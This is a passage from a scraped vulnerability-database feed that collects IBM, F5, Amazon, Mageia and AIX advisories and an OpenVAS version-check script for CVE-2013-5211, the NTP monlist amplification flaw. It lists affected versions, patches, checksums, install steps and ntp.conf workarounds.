\nCVSS Base Score: 4.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90357> \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV/N:AC/H:Au/N:C/P:I/P:A/N)\n\n## \n\n## Affected products and versions\n\nFrom the FSM command line enter **smcli lsconfig -V** to determine the level of FSM installed.\n\n * Flex System Manager 1.1.x.x\n * Flex System Manager 1.2.0.x\n * Flex System Manager 1.2.1.x\n * Flex System Manager 1.3.0.x\n * Flex System Manager 1.3.1.x\n * Flex System Manager 1.3.2.x\n\n### Non-affected products and versions\n\nAll versions are affected\n\n## Remediation:\n\nProduct | VRMF | APAR | Remediation \n---|---|---|--- \nFlex System Manager | 1.1.x.x | IT03235 | Upgrade to FSM 1.3.2.0, or open a PMR with support to request an APAR. \nFlex System Manager | 1.2.0.x | IT03235 | [ fsmfix1.2.0.0_IT03235](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.2.0.0_IT03235&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.2.1.x | IT03235 | [ fsmfix1.2.1.0_IT03235](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.2.1.0_IT03235&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.3.0.x | IT03235 | [ fsmfix1.3.0.0_IT03235](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.3.0.0_IT03235&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.3.1.x | IT03235 | [ 
fsmfix1.3.1.0_IT03235](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.3.1.0_IT03235&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.3.2.x | IT03235 | [ fsmfix1.3.2.0_IT03235](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.3.2.0_IT03235&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \n \n \n\n\n## Workaround(s) & Mitigation(s):\n\nNone Known \n\n\n## References:\n\n * [Complete CVSS Guide](<http://www.first.org/cvss/cvss-guide.html>)\n * [On-line Calculator V2](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n\n\n**Acknowledgement** \nNone\n\n**Change History** \n6 August 2014: Original Copy Published \n\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash.\n\nNote: According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {}, "published": "2019-01-31T01:25:01", "type": "ibm", "title": "Security Bulletin: IBM Flex System Manager (FSM) is affected by security vulnerabilities. 
(CVE-2013-5772, CVE-2013-5803, CVE-2013-5372, CVE-2013-5780, CVE-2013-5211)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2013-5372", "CVE-2013-5772", "CVE-2013-5780", "CVE-2013-5803", "CVE-2014-0411"], "modified": "2019-01-31T01:25:01", "id": "374A6C3A0CE569B825764739B7B6CA7FCCA4751B7295B1136B25E6F356FE8EBD", "href": "https://www.ibm.com/support/pages/node/865174", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "f5": [{"lastseen": "2021-06-08T18:45:10", "description": "*These BIG-IP, Enterprise Manager, and BIG-IQ versions use an affected version of NTP, but are not remotely vulnerable as the query operation is allowed only on localhost in our distribution.\n\nRecommended action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. 
If the table does not list any version in the column, then no upgrade candidate currently exists.\n\n**ARX**\n\nTo mitigate this vulnerability, you should not expose the ARX public interface to NTP queries.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL12766: ARX hotfix matrix\n", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "f5", "title": "SOL15154 - NTP vulnerability CVE-2013-5211", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-04-10T00:00:00", "id": "SOL15154", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15154.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2023-09-13T08:02:08", "description": " \n\n\nThe monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. 
([CVE-2013-5211](<https://vulners.com/cve/CVE-2013-5211>)) \n\n\nImpact \n\n\nA malicious remote attacker may cause a disruption of service.\n", "cvss3": {}, "published": "2014-04-10T18:47:00", "type": "f5", "title": "NTP vulnerability CVE-2013-5211", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2016-01-08T23:15:00", "id": "F5:K15154", "href": "https://support.f5.com/csp/article/K15154", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "amazon": [{"lastseen": "2023-07-28T06:56:17", "description": "**Issue Overview:**\n\nThe monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. (CVE-2013-5211)\n\n \n**Affected Packages:** \n\n\nntp\n\n \n**Issue Correction:** \nRun _yum update ntp_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n \u00a0\u00a0\u00a0 ntp-4.2.8p15-3.amzn2.0.4.aarch64 \n \u00a0\u00a0\u00a0 ntpdate-4.2.8p15-3.amzn2.0.4.aarch64 \n \u00a0\u00a0\u00a0 sntp-4.2.8p15-3.amzn2.0.4.aarch64 \n \u00a0\u00a0\u00a0 ntp-debuginfo-4.2.8p15-3.amzn2.0.4.aarch64 \n \n i686: \n \u00a0\u00a0\u00a0 ntp-4.2.8p15-3.amzn2.0.4.i686 \n \u00a0\u00a0\u00a0 ntpdate-4.2.8p15-3.amzn2.0.4.i686 \n \u00a0\u00a0\u00a0 sntp-4.2.8p15-3.amzn2.0.4.i686 \n \u00a0\u00a0\u00a0 ntp-debuginfo-4.2.8p15-3.amzn2.0.4.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 ntp-perl-4.2.8p15-3.amzn2.0.4.noarch \n \u00a0\u00a0\u00a0 ntp-doc-4.2.8p15-3.amzn2.0.4.noarch \n \n src: \n \u00a0\u00a0\u00a0 ntp-4.2.8p15-3.amzn2.0.4.src \n \n x86_64: \n \u00a0\u00a0\u00a0 ntp-4.2.8p15-3.amzn2.0.4.x86_64 \n \u00a0\u00a0\u00a0 ntpdate-4.2.8p15-3.amzn2.0.4.x86_64 \n \u00a0\u00a0\u00a0 sntp-4.2.8p15-3.amzn2.0.4.x86_64 \n \u00a0\u00a0\u00a0 ntp-debuginfo-4.2.8p15-3.amzn2.0.4.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2013-5211](<https://access.redhat.com/security/cve/CVE-2013-5211>)\n\nMitre: [CVE-2013-5211](<https://vulners.com/cve/CVE-2013-5211>)\n", "cvss3": {}, "published": "2021-09-08T23:35:00", "type": "amazon", "title": "Medium: ntp", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2021-09-15T17:51:00", "id": "ALAS2-2021-1706", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1706.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "mageia": [{"lastseen": 
"2023-09-12T16:39:56", "description": "The \"monlist\" command of the NTP protocol is currently being abused in DDoS reflection attacks. This is done by sending requests with a spoofed source address, namely the address of the system the attack is directed at. The NTP installations themselves are not the target of the attack, but they are part of the DDoS network which the attacker is driving (CVE-2013-5211).\n\n** IMPORTANT ** Note: the workaround for this issue is not a change in the software, but instead is a change in the default configuration. In most cases, the configuration change will need to be made manually by administrators in the /etc/ntp.conf file, as the package will only install the updated configuration as /etc/ntp.conf.rpmnew. The following lines should be added to the end of /etc/ntp.conf:\n\n    # Permit time synchronization with our time source, but do not\n    # permit the source to query or modify the service on this system.\n    restrict default nomodify notrap nopeer noquery\n", "cvss3": {}, "published": "2014-01-31T16:44:56", "type": "mageia", "title": "Updated ntp packages work around security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-31T16:44:56", "id": "MGASA-2014-0032", "href": "https://advisories.mageia.org/MGASA-2014-0032.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "aix": [{"lastseen": "2023-09-12T18:15:19", "description": "\nIBM SECURITY ADVISORY\n\nFirst Issued: Thu Jun 12 16:24:51 CDT 2014\nUpdated: Tue Jul 1 12:35:38 CDT 2014\nUpdate: Corrected public key 
URL.\nUpdated: Wed Jul 2 15:20:29 CDT 2014\nUpdate: Added published advisory OpenSSL signature file.\nUpdated: Thu Jul 3 07:42:49 CDT 2014\nUpdate: Renamed tar file for TNC compliancy\n|Updated: Mon Jul 7 14:26:45 CDT 2014\n|Update: Corrected APAR Availability\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\nhttps://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\nftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\n\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: Network Time Protocol (NTP) vulnerability in AIX\n\nPLATFORMS: AIX 5.3, 6.1 and 7.1 releases\n VIOS 2.2.*\n\nSOLUTION: Apply the fix as described below.\n\nTHREAT: See below\n\nCVE Numbers: CVE-2013-5211 CVSS=5.0\n\nReboot required? NO\nWorkarounds? YES\n\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION \n \n The monlist feature in ntpd in NTP allows remote attackers to\n cause a denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\n\nII. CVSS\n\n CVSS Base Score: 5.0\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/90143 for the current score\n CVSS Environmental Score*: Undefined\n CVSS String: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\nIII. 
PLATFORM VULNERABILITY ASSESSMENT\n\n The following fileset levels are vulnerable:\n\n NTPv3:\n\n AIX Fileset Lower Level Upper Level KEY\n -------------------------------------------------------\n bos.net.tcp.client 5.3.12.0 5.3.12.10 key_w_fs\n bos.net.tcp.client 6.1.7.0 6.1.7.20 key_w_fs\n bos.net.tcp.client 6.1.8.0 6.1.8.17 key_w_fs\n bos.net.tcp.client 6.1.9.0 6.1.9.1 key_w_fs \n bos.net.tcp.client 7.1.1.0 7.1.1.20 key_w_fs\n bos.net.tcp.client 7.1.2.0 7.1.2.17 key_w_fs\n bos.net.tcp.client 7.1.3.0 7.1.3.2 key_w_fs\n\n AIX Fileset (VIOS) Lower Level Upper Level\n ---------------------------------------------------------\n bos.net.tcp.client 6.1.7.0(2.2.1.0) 6.1.7.20(2.2.1.8)\n bos.net.tcp.client 6.1.8.0(2.2.2.0) 6.1.8.17(2.2.2.4)\n bos.net.tcp.client 6.1.9.0(2.2.3.0) 6.1.9.1 (2.2.3.2)\n\n NTPv4:\n\n AIX Fileset Lower Level Upper Level KEY\n --------------------------------------------------------\n ntp.rte 6.1.6.0 6.1.6.1 key_w_fs\n ntp.rte 7.1.0.0 7.1.0.1 key_w_fs\n\n AIX Fileset (VIOS) Lower Level Upper Level\n --------------------------------------------------------\n ntp.rte 6.1.6.0(2.2.1.0) 6.1.6.1(2.2.1.8)\n ntp.rte 6.1.6.0(2.2.2.0) 6.1.6.1(2.2.2.4)\n ntp.rte 6.1.6.0(2.2.3.0) 6.1.6.1(2.2.3.2)\n\n NOTE: To find out whether the affected filesets are installed on your\n systems, refer to the lslpp command found in AIX user's guide.\n\nIV. SOLUTIONS\n\n A. APARS\n\n IBM has assigned the following APARs to the problem:\n\n NOTE: APARs are only applicable to NTPv3. 
For NTPv4 refer to steps mentioned\n in FIXES section under NTPv4 heading below.\n\n AIX Level APAR number Availability KEY\n -------------------------------------------------------------\n| 5.3.12 IV59636 NOW (ifix-only) key_w_apar\n| 6.1.8 IV58068 12/31/2014 SP6 key_w_apar\n| 6.1.9 IV56213 10/24/2014 SP4 key_w_apar\n| 7.1.2 IV55365 12/31/2014 SP6 key_w_apar\n| 7.1.3 IV56324 10/24/2014 SP4 key_w_apar\n\n VIOS Level APAR number Availability\n ---------------------------------------------------\n| 2.2.2 IV58068 12/31/2014 2.2.2.5\n| 2.2.3 IV56213 10/24/2014 2.2.3.4\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV59636\n http://www.ibm.com/support/docview.wss?uid=isg1IV58068\n http://www.ibm.com/support/docview.wss?uid=isg1IV56213\n http://www.ibm.com/support/docview.wss?uid=isg1IV55365\n http://www.ibm.com/support/docview.wss?uid=isg1IV56324\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n NTPv3 (Network Time Protocol Version 3)\n =======================================\n\n Fixes for NTPv3 are available. The fixes can be downloaded via ftp\n from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_fix.tar\n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. 
This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n AIX Level Interim Fix (*.Z) KEY\n --------------------------------------------------\n 5.3.12.9 IV59636s9a.140423.epkg.Z key_w_fix\n 6.1.7.9 IV58413s9a.140421.epkg.Z key_w_fix\n 6.1.8.4 IV58068s4a.140421.epkg.Z key_w_fix\n 6.1.9.2 IV56213s1a.140421.epkg.Z key_w_fix\n 7.1.1.9 IV56575s9a.140421.epkg.Z key_w_fix\n 7.1.2.4 IV55365s4a.140421.epkg.Z key_w_fix\n 7.1.3.2 IV56324s2a.140522.epkg.Z key_w_fix\n\n VIOS Level Interim Fix (*.Z)\n ------------------------------------\n 2.2.1.8 IV58413s9a.140421.epkg.Z\n 2.2.2.4 IV58068s4a.140421.epkg.Z\n 2.2.3.2 IV56213s1a.140421.epkg.Z\n\n To extract the fixes from the tar file:\n tar xvf ntp_fix.tar \n cd ntp_ifix\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the followng:\n\n openssl dgst -sha256 filename KEY\n ----------------------------------------------------------------------------------------------------\n ed2aa3b4f2076fd24808e20ef32ff7ee70d2c0ff39092954045ef7163b80541a IV59636s9a.140423.epkg.Z key_w_csum\n a319f02951cbb95a028f75de2548df53c8ad159383b67df5264f8c25fc202cc5 IV58413s9a.140421.epkg.Z key_w_csum\n 3cdd922dae20c9ffab304badbbe6f8fd893bc057515ecc860aa5afca8867261f IV58068s4a.140421.epkg.Z key_w_csum\n 014f4cf77b7c3dd0ad94191211da197c6be5b900224db1ec25f5b5bf3506f690 IV56213s1a.140421.epkg.Z key_w_csum\n 4de291d684a6eec060398086637d0fe7441aaa2e84618313d4662f2ed564a879 IV56575s9a.140421.epkg.Z key_w_csum\n 649feede9f57aa537b09f350cddbcc1d7a16b782a935bc7a5b4ffbd47bce7fb3 IV55365s4a.140421.epkg.Z key_w_csum\n 8ec8d0ed64d21642a9d95e43545daca1d9ac910730ee351a3d01fbd5d30c8acd IV56324s2a.140522.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. 
If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc.sig\n\n\n NTPv4 (Network Time Protocol Version 4)\n =======================================\n\n A fix is available, and it can be downloaded from:\n\n https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=NTPv4&cp=UTF-8\n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n NTPv3 (Network Time Protocol Version 3)\n =======================================\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being 
installed.\n\n NTPv4 (Network Time Protocol Version 4) AIX 6.1\n ===============================================\n\n NTPv4 Install images v6.1.6.2 for AIX 6.1 ntp4-6.1.6.2.tar\n\n \tTo extract the fixes from the tar file \n \ttar -xvf ntp4-6.1.6.2.tar\n\n To preview the fix installation:\n\n cd ntp4-6.1.6.2\n installp -apYd . ntp\n\n To install the fix package:\n\n cd ntp4-6.1.6.2\n installp -aXYd . ntp\n \n For NTPv4 use on AIX 6.1, please follow steps in link \n\n http://publib.boulder.ibm.com/infocenter/aix/v6r1/topic/com.ibm.aix.files/doc/aixfiles/ntp.htm?resultof=%22%6e%74%70%34%22%20\n\n IMPORTANT: The fix will not take effect until any running xntpd\n servers have been stopped and restarted with the following\n commands:\n \n stopsrc -s xntpd\n startsrc -s xntpd\n\n NTPv4 (Network Time Protocol Version 4) AIX 7.1\n ===============================================\n\n NTPv4 Install images v7.1.0.2 for AIX 7.1 ntp4-7.1.0.2.tar\n\n To extract the fixes from the tar file \n\t\t\t\t\t\n \ttar -xvf ntp4-7.1.0.2.tar\n\t\n To preview the fix installation:\n\n cd ntp4-7.1.0.2\n installp -apYd . ntp\n\n To install the fix package:\n\n cd ntp4-7.1.0.2\n installp -aXYd . ntp\n \n For NTPv4 use on AIX 7.1, please follow steps in link \n\n http://publib.boulder.ibm.com/infocenter/aix/v7r1/topic/com.ibm.aix.files/doc/aixfiles/ntp.htm?resultof=%22%6e%74%70%34%22%20\n\n IMPORTANT: The fix will not take effect until any running xntpd\n servers have been stopped and restarted with the following\n commands:\n \n stopsrc -s xntpd\n startsrc -s xntpd\n\nV. WORKAROUNDS\n\n Use noquery in your default restrictions to block all status queries.\n\n Or\n\n Use disable monitor to disable the ntpdc -c monlist command while still \n allowing other status queries. \n\nVI. 
CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit:\n\n http://www.ibm.com/systems/support\n\n and click on the \"My notifications\" link.\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n\n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any assistance.\n\nVII. ACKNOWLEDGMENTS:\n\n IBM discovered and fixed this vulnerability as part of its\n commitment to secure the AIX operating system.\n\nVIII. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/\n CVE-2013-5211: https://vulners.com/cve/CVE-2013-5211\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. 
Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n", "cvss3": {}, "published": "2014-06-12T16:24:51", "type": "aix", "title": "Network Time Protocol (NTP) vulnerability in AIX,Network Time Protocol (NTP) vulnerability in VIOS", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-07-07T14:26:45", "id": "NTP_ADVISORY.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:36:16", "description": "Gentoo Linux Local Security Checks GLSA 201401-08", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201401-08", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121105", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310121105", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201401-08.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121105\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:26:32 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201401-08\");\n script_tag(name:\"insight\", value:\"ntpd is susceptible to a reflected Denial of Service attack. 
Please review the CVE identifiers and references below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201401-08\");\n script_cve_id(\"CVE-2013-5211\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201401-08\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-misc/ntp\", unaffected: make_list(\"ge 4.2.6_p5-r10\"), vulnerable: make_list(\"lt 4.2.6_p5-r10\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:43", "description": "DoS in NTP server", "cvss3": {}, "published": "2014-07-31T00:00:00", "type": "openvas", "title": "Junos NTP Server Amplification Denial of Service Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2018-10-25T00:00:00", "id": "OPENVAS:1361412562310105920", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105920", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_junos_cve_2013-5211.nasl 12095 2018-10-25 12:00:24Z cfischer $\n#\n# Junos NTP Server Amplification Denial of 
